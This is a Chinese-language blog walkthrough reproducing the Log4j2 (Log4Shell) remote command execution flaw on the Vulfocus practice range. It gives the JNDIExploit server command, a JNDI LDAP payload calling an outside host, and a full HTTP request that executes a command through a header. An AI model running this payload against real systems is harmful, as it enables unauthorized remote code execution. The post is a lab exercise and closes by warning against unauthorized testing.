【Vulfocus解題系列】手把手教你使用Vulfocus公開靶場對Apache Log4j2遠端命令執行漏洞復現

huaflwr發表於2021-12-12

前言

關於這個漏洞,啥都不用說了,直接發車。

工具下載

JNDIExploit:https://github.com/0x727/JNDIExploit

復現過程

  1. 啟動靶場環境

    直接用vulfocus啟一個環境。
    官網地址:http://vulfocus.fofa.so/

​ 沒註冊的先註冊,進來首頁即可看到靶場

image-20211212143803332

  1. 用JNDIExploit啟一個ldap的服務。

  2. 命令如下:

    java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1234 -p 8988 -i 0.0.0.0

    image-20211212145457761

  3. 接著將payload更改如下:
    payload=${jndi:ldap://1.2.3.4:1234/TomcatBypass/TomcatEcho}

    注意Content-Type的型別為:application/x-www-form-urlencoded
    在請求頭中新增cmd欄位,後面跟上需要執行的命令即可。

    完整資料包如下:

    POST /hello  HTTP/1.1
    Host: vulfocus.fofa.so:41624
    Content-Type: application/x-www-form-urlencoded
    cmd: whoami
    Content-Length: 47
    
    payload=${jndi:ldap://1.2.3.4:1234/TomcatBypass/TomcatEcho}
    

    成功回顯命令:

    image-20211212145553316

後記

使用公開靶場或自己搭建環境進行漏洞的復現和研究,是完全沒問題的,但切忌隨意在網際網路進行大範圍未授權測試,因為總會有人來收拾這一地雞毛。

相關文章